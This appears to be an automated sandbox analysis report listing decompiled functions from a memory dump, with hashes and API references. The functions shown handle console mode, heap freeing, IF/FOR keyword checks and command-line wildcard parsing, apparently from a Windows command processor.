                                                    • Opcode ID: 2a500798ed1c25210fb46c0878df980409aaa44a5b7c4517a16f5a05102885cc
                                                    • Instruction ID: 4c487068d14a3d6b0647b84abe2f30d3305ad894d05d26a4459f6eacb17d4a89
                                                    • Opcode Fuzzy Hash: 2a500798ed1c25210fb46c0878df980409aaa44a5b7c4517a16f5a05102885cc
                                                    • Instruction Fuzzy Hash: 1BE09232A4461267EE3476F97C1DF862E949B94B39F114448FB85CA0C4DE20C4C08BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F9897, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E011F9897() {
				signed int _v8;
				void* _t4;
				int _t5;
				void* _t7;
				void* _t9;

				_t4 =  &_v8;
				__imp___get_osfhandle(_t4, _t9);
				_t5 = GetConsoleMode(_t4, 1);
				if(_t5 != 0) {
					_t7 = _v8 & 0xfffffffb;
					_v8 = _t7;
					__imp___get_osfhandle(_t7);
					return SetConsoleMode(_t7, 1);
				}
				return _t5;
			}








                                                    0x011f989d
                                                    0x011f98a3
                                                    0x011f98ab
                                                    0x011f98b3
                                                    0x011f98b8
                                                    0x011f98be
                                                    0x011f98c1
                                                    0x00000000
                                                    0x011f98c9
                                                    0x011f98d2

                                                    APIs
                                                    • _get_osfhandle.MSVCRT ref: 011F98A3
                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,011F3811,?,?,00000001,?), ref: 011F98AB
                                                    • _get_osfhandle.MSVCRT ref: 011F98C1
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F3811,?,?,00000001,?), ref: 011F98C9
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ConsoleMode_get_osfhandle
                                                    • String ID:
                                                    • API String ID: 1606018815-0
                                                    • Opcode ID: 7212170d9ac54259dcb61945c81d657af1683eb9892d0b80b239e2f5ca9b386f
                                                    • Instruction ID: dad0fbfef5491f2ff70b8b154ce74b5d15a43aeff037ec27626b183b96b7690e
                                                    • Opcode Fuzzy Hash: 7212170d9ac54259dcb61945c81d657af1683eb9892d0b80b239e2f5ca9b386f
                                                    • Instruction Fuzzy Hash: 1BE01A72900609EBEF20DBA5E81EBAA7B6CEB00325F100956F915C61C1DE71DA809B60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E4C00, Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E011E4C00() {
				void* _t1;
				void* _t2;
				intOrPtr _t4;

				_t4 =  *0x120387c;
				_t1 =  *0x1203878;
				 *0x1203880 = _t4;
				 *0x1203884 = _t1;
				__imp___get_osfhandle(_t4);
				_t2 = SetConsoleMode(_t1, 1);
				__imp___get_osfhandle( *0x1203884);
				return SetConsoleMode(_t2, 0);
			}






                                                    0x011e4c00
                                                    0x011e4c06
                                                    0x011e4c0e
                                                    0x011e4c14
                                                    0x011e4c19
                                                    0x011e4c21
                                                    0x011e4c2f
                                                    0x011e4c3d

                                                    APIs
                                                    • _get_osfhandle.MSVCRT ref: 011E4C19
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E4C21
                                                    • _get_osfhandle.MSVCRT ref: 011E4C2F
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E4C37
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ConsoleMode_get_osfhandle
                                                    • String ID:
                                                    • API String ID: 1606018815-0
                                                    • Opcode ID: 0d436f267e146aaec29645c3d4618b2b7733ab316f18fe81d7d4d5981318e2d6
                                                    • Instruction ID: ec6dbe24701a0c3c265431f4d6d29991e6dcf2e7dd235b3d323c8d355a4eef70
                                                    • Opcode Fuzzy Hash: 0d436f267e146aaec29645c3d4618b2b7733ab316f18fe81d7d4d5981318e2d6
                                                    • Instruction Fuzzy Hash: 03E0BDB2A00201EFEF2ADBA0F81EB547BB5F718305B001A9AF1118318ADBB1A580DB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DACD5, Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E011DACD5(void** __ecx) {
				void* _t6;

				_t6 = __ecx;
				RtlFreeHeap(GetProcessHeap(), 0,  *__ecx);
				return RtlFreeHeap(GetProcessHeap(), 0, _t6);
			}




                                                    0x011dacd8
                                                    0x011dace5
                                                    0x011dacfc

                                                    APIs
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,011DACAB), ref: 011DACDE
                                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACE5
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DACEE
                                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACF5
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: ea90221ba5e5c74c1bed722ef868257a90c0bdc25c0d243a2a47a77c8d4fc69d
                                                    • Instruction ID: 316ab2fa5e4eda9d2893ef8daea3b0ef5cd291242f6a99c940100309ea334011
                                                    • Opcode Fuzzy Hash: ea90221ba5e5c74c1bed722ef868257a90c0bdc25c0d243a2a47a77c8d4fc69d
                                                    • Instruction Fuzzy Hash: 46D09232804110ABDE607BA1B81DBC63A28EB59226F110449FA4582048CEB088C08B61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D9429, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E011D9429(void* __ebx, signed short* __ecx, void* __edi) {
				intOrPtr _v8;
				signed int _t19;
				intOrPtr _t20;
				void* _t21;
				void* _t22;
				signed int _t23;
				signed int _t26;
				void* _t28;
				signed int _t34;
				signed int _t35;
				char* _t37;
				signed int _t38;
				void* _t40;
				signed int _t43;
				signed int _t45;
				signed int _t47;
				intOrPtr* _t51;
				signed int _t55;
				void* _t56;
				signed int _t61;
				signed short* _t70;
				signed int _t71;
				signed int _t76;
				signed int _t77;
				void* _t78;
				void* _t79;
				signed int _t82;
				signed int _t84;
				void* _t86;
				signed int _t87;
				signed int _t89;

				_push(__ecx);
				_t89 = __ecx;
				if(__ecx == 0) {
					L17:
					_t19 = 1;
					L12:
					return _t19;
				}
				_t20 = E011E00B0(0xffce);
				_v8 = _t20;
				if(_t20 == 0) {
					goto L17;
				}
				_push(__ebx);
				_t21 = 0x5e;
				_t22 = E011DD7D4(__ecx, _t21);
				_t45 = 0;
				if(_t22 != 0) {
					_t51 = __ecx;
					_t70 =  &(__ecx[1]);
					do {
						_t23 =  *_t51;
						_t51 = _t51 + 2;
						__eflags = _t23;
					} while (_t23 != 0);
					_t84 = E011E00B0(2 + (_t51 - _t70 >> 1) * 4);
					__eflags = _t84;
					if(_t84 == 0) {
						L51:
						_t19 = 1;
						L11:
						goto L12;
					}
					_t26 =  *__ecx & 0x0000ffff;
					_t55 = _t84;
					__eflags = _t26;
					if(_t26 == 0) {
						L28:
						_t71 = _t84;
						__eflags = 0;
						 *_t55 = 0;
						_t11 = _t71 + 2; // 0x2
						_t56 = _t11;
						do {
							_t28 =  *_t71;
							_t71 = _t71 + 2;
							__eflags = _t28 - _t45;
						} while (_t28 != _t45);
						_t89 = E011E0100(_t84, 2 + (_t71 - _t56 >> 1) * 2);
						__eflags = _t89;
						if(_t89 == 0) {
							goto L51;
						}
						goto L3;
					}
					_t82 = _t26;
					_t47 = 0x5e;
					do {
						 *_t55 = _t82;
						_t89 = _t89 + 2;
						_t55 = _t55 + 2;
						__eflags = _t82 - _t47;
						if(_t82 == _t47) {
							 *_t55 = _t47;
							_t55 = _t55 + 2;
							__eflags = _t55;
						}
						_t43 =  *_t89 & 0x0000ffff;
						_t82 = _t43;
						__eflags = _t43;
					} while (_t43 != 0);
					_t45 = 0;
					__eflags = 0;
					goto L28;
				}
				L3:
				 *0x11fd538 = 1;
				_t86 = E011DEEF0(1, _t89,  *0x1213cd8);
				 *0x11fd538 = _t45;
				if(_t86 == 1) {
					_t87 = E011DDF40(_t89);
					__eflags = _t87;
					if(_t87 == 0) {
						goto L51;
					}
					__imp___wcsupr(_t87);
					_t61 = L" IF";
					_t34 = _t87;
					while(1) {
						_t76 =  *_t34;
						__eflags = _t76 -  *_t61;
						if(_t76 !=  *_t61) {
							break;
						}
						__eflags = _t76;
						if(_t76 == 0) {
							L38:
							_t35 = _t45;
							L40:
							__eflags = _t35;
							if(_t35 == 0) {
								L49:
								E011DC5A2(_t61, 0x234a, 1, _t89);
								goto L51;
							}
							_t37 = L" FOR";
							while(1) {
								_t61 =  *_t87;
								__eflags = _t61 -  *_t37;
								if(_t61 !=  *_t37) {
									break;
								}
								__eflags = _t61;
								if(_t61 == 0) {
									L48:
									__eflags = _t45;
									if(_t45 != 0) {
										goto L51;
									}
									goto L49;
								}
								_t61 =  *((intOrPtr*)(_t87 + 2));
								__eflags = _t61 - _t37[2];
								if(_t61 != _t37[2]) {
									break;
								}
								_t87 = _t87 + 4;
								_t37 =  &(_t37[4]);
								__eflags = _t61;
								if(_t61 != 0) {
									continue;
								}
								goto L48;
							}
							asm("sbb ebx, ebx");
							_t45 = _t45 | 0x00000001;
							__eflags = _t45;
							goto L48;
						}
						_t77 =  *((intOrPtr*)(_t34 + 2));
						__eflags = _t77 -  *((intOrPtr*)(_t61 + 2));
						if(_t77 !=  *((intOrPtr*)(_t61 + 2))) {
							break;
						}
						_t34 = _t34 + 4;
						_t61 = _t61 + 4;
						__eflags = _t77;
						if(_t77 != 0) {
							continue;
						}
						goto L38;
					}
					asm("sbb eax, eax");
					_t35 = _t34 | 0x00000001;
					__eflags = _t35;
					goto L40;
				}
				if(_t86 == 0xffffffff) {
					_t19 = 0;
					goto L11;
				}
				if( *0x1213cc9 == 0 ||  *((short*)( *((intOrPtr*)(_t86 + 0x38)))) != 0x3a) {
					_t78 = 0x2a;
					_t38 = E011DD7D4( *((intOrPtr*)(_t86 + 0x38)), _t78);
					__eflags = _t38;
					if(_t38 != 0) {
						L16:
						_t19 = E011E07C0(_t45, _t86);
						goto L11;
					}
					_t79 = 0x3f;
					__eflags = E011DD7D4( *((intOrPtr*)(_t86 + 0x38)), _t79);
					if(__eflags != 0) {
						goto L16;
					}
					_t91 = _v8;
					_t40 = E011E10B0(_t86, _v8, __eflags, 0x7fe7);
					__eflags = _t40 - 2;
					if(_t40 == 2) {
						goto L9;
					}
					goto L16;
				} else {
					if( *0x1213cc4 == 0) {
						_push(_t45);
						_push(0x400023aa);
						E011DC5A2(1);
						goto L51;
					}
					_t91 = _v8;
					L9:
					_t19 = E011E2ABE(_t86, _t91, 0x7fe7, 1);
					if(_t19 == 0) {
						_t19 =  *0x120b8b0;
					}
					goto L11;
				}
			}


































                                                    0x011d942e
                                                    0x011d9430
                                                    0x011d9434
                                                    0x011d9517
                                                    0x011d9519
                                                    0x011d94d5
                                                    0x011d94d9
                                                    0x011d94d9
                                                    0x011d943f
                                                    0x011d9444
                                                    0x011d9449
                                                    0x00000000
                                                    0x00000000
                                                    0x011d944f
                                                    0x011d9453
                                                    0x011d9458
                                                    0x011d945d
                                                    0x011d9461
                                                    0x011f0975
                                                    0x011f0977
                                                    0x011f097a
                                                    0x011f097a
                                                    0x011f097d
                                                    0x011f0980
                                                    0x011f0980
                                                    0x011f0995
                                                    0x011f0997
                                                    0x011f0999
                                                    0x011f0aa4
                                                    0x011f0aa6
                                                    0x011d94d3
                                                    0x00000000
                                                    0x011d94d4
                                                    0x011f099f
                                                    0x011f09a2
                                                    0x011f09a4
                                                    0x011f09a7
                                                    0x011f09ce
                                                    0x011f09ce
                                                    0x011f09d0
                                                    0x011f09d2
                                                    0x011f09d5
                                                    0x011f09d5
                                                    0x011f09d8
                                                    0x011f09d8
                                                    0x011f09db
                                                    0x011f09de
                                                    0x011f09de
                                                    0x011f09f5
                                                    0x011f09f7
                                                    0x011f09f9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f09ff
                                                    0x011f09ab
                                                    0x011f09ad
                                                    0x011f09ae
                                                    0x011f09ae
                                                    0x011f09b1
                                                    0x011f09b4
                                                    0x011f09b7
                                                    0x011f09ba
                                                    0x011f09bc
                                                    0x011f09bf
                                                    0x011f09bf
                                                    0x011f09bf
                                                    0x011f09c2
                                                    0x011f09c5
                                                    0x011f09c7
                                                    0x011f09c7
                                                    0x011f09cc
                                                    0x011f09cc
                                                    0x00000000
                                                    0x011f09cc
                                                    0x011d9467
                                                    0x011d9474
                                                    0x011d947e
                                                    0x011d9480
                                                    0x011d9489
                                                    0x011f0a0b
                                                    0x011f0a0d
                                                    0x011f0a0f
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0a16
                                                    0x011f0a1d
                                                    0x011f0a22
                                                    0x011f0a24
                                                    0x011f0a24
                                                    0x011f0a27
                                                    0x011f0a2a
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0a2c
                                                    0x011f0a2f
                                                    0x011f0a46
                                                    0x011f0a46
                                                    0x011f0a4f
                                                    0x011f0a4f
                                                    0x011f0a51
                                                    0x011f0a85
                                                    0x011f0a8d
                                                    0x00000000
                                                    0x011f0a92
                                                    0x011f0a53
                                                    0x011f0a58
                                                    0x011f0a58
                                                    0x011f0a5b
                                                    0x011f0a5e
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0a60
                                                    0x011f0a63
                                                    0x011f0a81
                                                    0x011f0a81
                                                    0x011f0a83
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0a83
                                                    0x011f0a65
                                                    0x011f0a69
                                                    0x011f0a6d
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0a6f
                                                    0x011f0a72
                                                    0x011f0a75
                                                    0x011f0a78
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0a7a
                                                    0x011f0a7c
                                                    0x011f0a7e
                                                    0x011f0a7e
                                                    0x00000000
                                                    0x011f0a7e
                                                    0x011f0a31
                                                    0x011f0a35
                                                    0x011f0a39
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0a3b
                                                    0x011f0a3e
                                                    0x011f0a41
                                                    0x011f0a44
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0a44
                                                    0x011f0a4a
                                                    0x011f0a4c
                                                    0x011f0a4c
                                                    0x00000000
                                                    0x011f0a4c
                                                    0x011d9492
                                                    0x011d951c
                                                    0x00000000
                                                    0x011d951c
                                                    0x011d949f
                                                    0x011d94df
                                                    0x011d94e0
                                                    0x011d94e5
                                                    0x011d94e7
                                                    0x011d950e
                                                    0x011d9510
                                                    0x00000000
                                                    0x011d9510
                                                    0x011d94ee
                                                    0x011d94f4
                                                    0x011d94f6
                                                    0x00000000
                                                    0x00000000
                                                    0x011d94f8
                                                    0x011d9504
                                                    0x011d9509
                                                    0x011d950c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d94aa
                                                    0x011d94b1
                                                    0x011f0a97
                                                    0x011f0a98
                                                    0x011f0a9d
                                                    0x00000000
                                                    0x011f0aa3
                                                    0x011d94b7
                                                    0x011d94ba
                                                    0x011d94c5
                                                    0x011d94cc
                                                    0x011d94ce
                                                    0x011d94ce
                                                    0x00000000
                                                    0x011d94cc

                                                    APIs
                                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                                      • Part of subcall function 011DEEF0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DEF39
                                                      • Part of subcall function 011DEEF0: RtlFreeHeap.NTDLL(00000000,?,011DE5F6), ref: 011DEF40
                                                      • Part of subcall function 011DEEF0: _setjmp3.MSVCRT ref: 011DEFA5
                                                    • _wcsupr.MSVCRT ref: 011F0A16
                                                      • Part of subcall function 011E2ABE: memset.MSVCRT ref: 011E2B59
                                                      • Part of subcall function 011E2ABE: ??_V@YAXPAX@Z.MSVCRT ref: 011E2C13
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                                    • String ID: FOR$ IF
                                                    • API String ID: 3818062306-2924197646
                                                    • Opcode ID: 7d4da49165f7043b59d530ac4db86cddf4e1734a70d836e0899047e3eca2637b
                                                    • Instruction ID: bdd056f49abe3a42dbb47cc429709a94b2f7332799ef172122c85a4215c72833
                                                    • Opcode Fuzzy Hash: 7d4da49165f7043b59d530ac4db86cddf4e1734a70d836e0899047e3eca2637b
                                                    • Instruction Fuzzy Hash: 5051383570020386EB3EAB6C981477B6293EF9861CB55412DEB068B296FF71D985C381
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011FB2BF, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E011FB2BF(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t68;
				signed int _t70;
				int _t73;
				signed int _t78;
				signed int _t79;
				intOrPtr _t82;
				signed int _t88;
				void* _t93;
				intOrPtr _t96;
				signed int _t99;
				signed int _t100;
				intOrPtr* _t101;
				short _t105;
				long _t108;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				signed int _t121;
				signed int _t124;
				void* _t125;
				intOrPtr _t126;
				void* _t128;

				_push(0x30);
				_push(0x11fc160);
				E011E7678(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t128 - 0x3c)) = __edx;
				 *((intOrPtr*)(_t128 - 0x24)) = __ecx;
				_t68 = E011E00B0(0x4000);
				_t93 = _t68;
				 *(_t128 - 0x40) = _t93;
				if(_t93 == 0) {
					L46:
					return E011E76BD(_t68);
				}
				_t121 = 0;
				 *((intOrPtr*)(_t128 - 4)) = 0;
				if( *((intOrPtr*)(_t128 + 0x14)) != 0) {
					L4:
					_t115 = _t121;
					 *(_t128 - 0x2c) = _t115;
					_t119 = _t121;
					 *(_t128 - 0x28) = _t119;
					_t70 = _t68 | 0xffffffff;
					__eflags = _t70;
					 *(_t128 - 0x1c) = _t70;
					 *(_t128 - 0x30) = _t70;
					 *(_t128 - 0x20) = _t121;
					 *(_t128 - 0x34) = 0x2a;
					while(1) {
						 *(_t128 - 0x38) = _t121;
						_t96 =  *((intOrPtr*)(_t128 + 8));
						__eflags = _t121 - _t96;
						if(_t121 >= _t96) {
							break;
						}
						_t108 =  *( *((intOrPtr*)(_t128 - 0x24)) + _t121 * 2) & 0x0000ffff;
						__eflags = _t108 - 0x2f;
						if(_t108 != 0x2f) {
							__eflags = _t108 - 0x22;
							if(_t108 != 0x22) {
								__eflags = _t115;
								if(_t115 != 0) {
									L17:
									_t110 =  *( *((intOrPtr*)(_t128 - 0x24)) + _t121 * 2) & 0x0000ffff;
									__eflags = _t110 - 0x3a;
									if(_t110 == 0x3a) {
										L22:
										_t35 = _t121 + 1; // 0x1
										_t70 = _t35;
										 *(_t128 - 0x1c) = _t70;
										 *(_t128 - 0x30) = _t70;
										L23:
										__eflags = 0;
										 *(_t128 - 0x20) = 0;
										L24:
										_t121 = _t121 + 1;
										continue;
									}
									__eflags = _t110 - 0x5c;
									if(_t110 == 0x5c) {
										goto L22;
									}
									__eflags = _t110 -  *(_t128 - 0x34);
									if(_t110 ==  *(_t128 - 0x34)) {
										L21:
										 *(_t128 - 0x20) = 1;
										goto L24;
									}
									__eflags = _t110 - 0x3f;
									if(_t110 != 0x3f) {
										goto L24;
									}
									goto L21;
								}
								_t88 = wcschr(L" &()[]{}^=;!%\'+,`~", _t108);
								_t115 =  *(_t128 - 0x2c);
								__eflags = _t88;
								if(_t88 == 0) {
									_t70 =  *(_t128 - 0x1c);
									goto L17;
								}
								_t25 = _t121 + 1; // 0x1
								_t119 = _t25;
								 *(_t128 - 0x28) = _t119;
								__eflags = 0;
								 *(_t128 - 0x20) = 0;
								L15:
								_t70 =  *(_t128 - 0x1c);
								goto L24;
							}
							__eflags = _t115;
							if(_t115 == 0) {
								_t119 = _t121;
								 *(_t128 - 0x28) = _t119;
							}
							__eflags = _t115;
							_t115 = 0 | _t115 == 0x00000000;
							 *(_t128 - 0x2c) = _t115;
							goto L15;
						}
						_t18 = _t121 + 1; // 0x1
						_t119 = _t18;
						 *(_t128 - 0x28) = _t119;
						goto L23;
					}
					__eflags = _t70 - 0xffffffff;
					if(_t70 == 0xffffffff) {
						L27:
						_t122 = _t119;
						 *(_t128 - 0x30) = _t119;
						L29:
						_t73 = _t96 - _t119 + _t96 - _t119;
						 *(_t128 - 0x34) = _t73;
						memcpy(_t93,  *((intOrPtr*)(_t128 - 0x24)) + _t119 * 2, _t73);
						_t78 =  *((intOrPtr*)(_t128 + 8)) - _t119;
						__eflags =  *(_t128 - 0x20);
						if(__eflags != 0) {
							__eflags = 0;
							 *((short*)(_t93 + _t78 * 2)) = 0;
						} else {
							_t105 = 0x2a;
							 *((short*)(_t93 + _t78 * 2)) = _t105;
							 *((short*)( *(_t128 - 0x34) + _t93 + 2)) = 0;
						}
						_t124 =  *(_t128 + 0x10);
						_t79 = E011FAEE5(_t93, __eflags, _t124, _t122 - _t119);
						 *0x11fd580 = _t79;
						_t99 = _t79;
						 *0x11fd57c = _t99;
						 *0x11fd574 = _t119;
						 *0x11fd578 = _t124;
						_t121 = 0;
						__eflags = 0;
						L33:
						if(_t79 == 0) {
							L45:
							 *((intOrPtr*)(_t128 - 4)) = 0xfffffffe;
							E011FB4D5(_t93);
							_t68 =  *0x11fd580; // 0x0
							goto L46;
						}
						if( *((intOrPtr*)(_t128 + 0xc)) == 0) {
							_t100 = _t99 - 1;
							__eflags = _t100;
							 *0x11fd57c = _t100;
							if(_t100 >= 0) {
								L40:
								_t116 =  *((intOrPtr*)( *0x121853c + _t100 * 4));
								_t101 =  *((intOrPtr*)( *0x121853c + _t100 * 4));
								_t125 = _t101 + 2;
								do {
									_t82 =  *_t101;
									_t101 = _t101 + 2;
								} while (_t82 !=  *((intOrPtr*)(_t128 - 4)));
								_t126 =  *((intOrPtr*)(_t128 - 0x3c));
								if((_t101 - _t125 >> 1) + _t119 < _t126) {
									__eflags = _t126 - _t119;
									E011E1040( *((intOrPtr*)(_t128 - 0x24)) + _t119 * 2, _t126 - _t119, _t116);
								} else {
									 *0x11fd580 = 0;
								}
								goto L45;
							}
							_t56 = _t79 - 1; // -1
							_t100 = _t56;
							L39:
							 *0x11fd57c = _t100;
							goto L40;
						}
						_t100 = _t99 + 1;
						 *0x11fd57c = _t100;
						if(_t100 < _t79) {
							goto L40;
						}
						_t100 = _t121;
						goto L39;
					}
					__eflags = _t70 - _t119;
					if(_t70 >= _t119) {
						_t122 =  *(_t128 - 0x1c);
						goto L29;
					}
					goto L27;
				}
				_t68 =  *0x11fd578; // 0x0
				if(_t68 !=  *(_t128 + 0x10)) {
					goto L4;
				}
				_t79 =  *0x11fd580; // 0x0
				_t99 =  *0x11fd57c; // 0x0
				_t119 =  *0x11fd574; // 0x0
				goto L33;
			}

























                                                    0x011fb2bf
                                                    0x011fb2c1
                                                    0x011fb2c6
                                                    0x011fb2cb
                                                    0x011fb2ce
                                                    0x011fb2d6
                                                    0x011fb2db
                                                    0x011fb2dd
                                                    0x011fb2e2
                                                    0x011fb4ca
                                                    0x011fb4cf
                                                    0x011fb4cf
                                                    0x011fb2e8
                                                    0x011fb2ea
                                                    0x011fb2f0
                                                    0x011fb312
                                                    0x011fb312
                                                    0x011fb314
                                                    0x011fb317
                                                    0x011fb319
                                                    0x011fb31c
                                                    0x011fb31c
                                                    0x011fb31f
                                                    0x011fb322
                                                    0x011fb325
                                                    0x011fb328
                                                    0x011fb32f
                                                    0x011fb32f
                                                    0x011fb332
                                                    0x011fb335
                                                    0x011fb337
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb340
                                                    0x011fb344
                                                    0x011fb347
                                                    0x011fb351
                                                    0x011fb354
                                                    0x011fb36d
                                                    0x011fb36f
                                                    0x011fb399
                                                    0x011fb39c
                                                    0x011fb3a0
                                                    0x011fb3a3
                                                    0x011fb3be
                                                    0x011fb3be
                                                    0x011fb3be
                                                    0x011fb3c1
                                                    0x011fb3c4
                                                    0x011fb3c7
                                                    0x011fb3c7
                                                    0x011fb3c9
                                                    0x011fb3cc
                                                    0x011fb3cc
                                                    0x00000000
                                                    0x011fb3cc
                                                    0x011fb3a5
                                                    0x011fb3a8
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb3aa
                                                    0x011fb3ae
                                                    0x011fb3b5
                                                    0x011fb3b5
                                                    0x00000000
                                                    0x011fb3b5
                                                    0x011fb3b0
                                                    0x011fb3b3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb3b3
                                                    0x011fb377
                                                    0x011fb37f
                                                    0x011fb382
                                                    0x011fb384
                                                    0x011fb396
                                                    0x00000000
                                                    0x011fb396
                                                    0x011fb386
                                                    0x011fb386
                                                    0x011fb389
                                                    0x011fb38c
                                                    0x011fb38e
                                                    0x011fb391
                                                    0x011fb391
                                                    0x00000000
                                                    0x011fb391
                                                    0x011fb356
                                                    0x011fb358
                                                    0x011fb35a
                                                    0x011fb35c
                                                    0x011fb35c
                                                    0x011fb361
                                                    0x011fb366
                                                    0x011fb368
                                                    0x00000000
                                                    0x011fb368
                                                    0x011fb349
                                                    0x011fb349
                                                    0x011fb34c
                                                    0x00000000
                                                    0x011fb34c
                                                    0x011fb3d2
                                                    0x011fb3d5
                                                    0x011fb3db
                                                    0x011fb3db
                                                    0x011fb3dd
                                                    0x011fb3e5
                                                    0x011fb3e9
                                                    0x011fb3eb
                                                    0x011fb3f7
                                                    0x011fb402
                                                    0x011fb404
                                                    0x011fb408
                                                    0x011fb41d
                                                    0x011fb41f
                                                    0x011fb40a
                                                    0x011fb40c
                                                    0x011fb40d
                                                    0x011fb416
                                                    0x011fb416
                                                    0x011fb426
                                                    0x011fb42c
                                                    0x011fb431
                                                    0x011fb436
                                                    0x011fb438
                                                    0x011fb43e
                                                    0x011fb444
                                                    0x011fb44a
                                                    0x011fb44a
                                                    0x011fb44c
                                                    0x011fb44e
                                                    0x011fb4b9
                                                    0x011fb4b9
                                                    0x011fb4c0
                                                    0x011fb4c5
                                                    0x00000000
                                                    0x011fb4c5
                                                    0x011fb454
                                                    0x011fb465
                                                    0x011fb465
                                                    0x011fb468
                                                    0x011fb46e
                                                    0x011fb479
                                                    0x011fb47e
                                                    0x011fb481
                                                    0x011fb483
                                                    0x011fb486
                                                    0x011fb486
                                                    0x011fb489
                                                    0x011fb48c
                                                    0x011fb499
                                                    0x011fb49e
                                                    0x011fb4aa
                                                    0x011fb4b4
                                                    0x011fb4a0
                                                    0x011fb4a2
                                                    0x011fb4a2
                                                    0x00000000
                                                    0x011fb49e
                                                    0x011fb470
                                                    0x011fb470
                                                    0x011fb473
                                                    0x011fb473
                                                    0x00000000
                                                    0x011fb473
                                                    0x011fb456
                                                    0x011fb457
                                                    0x011fb45f
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb461
                                                    0x00000000
                                                    0x011fb461
                                                    0x011fb3d7
                                                    0x011fb3d9
                                                    0x011fb3e2
                                                    0x00000000
                                                    0x011fb3e2
                                                    0x00000000
                                                    0x011fb3d9
                                                    0x011fb2f2
                                                    0x011fb2fa
                                                    0x00000000
                                                    0x00000000
                                                    0x011fb2fc
                                                    0x011fb301
                                                    0x011fb307
                                                    0x00000000

                                                    APIs
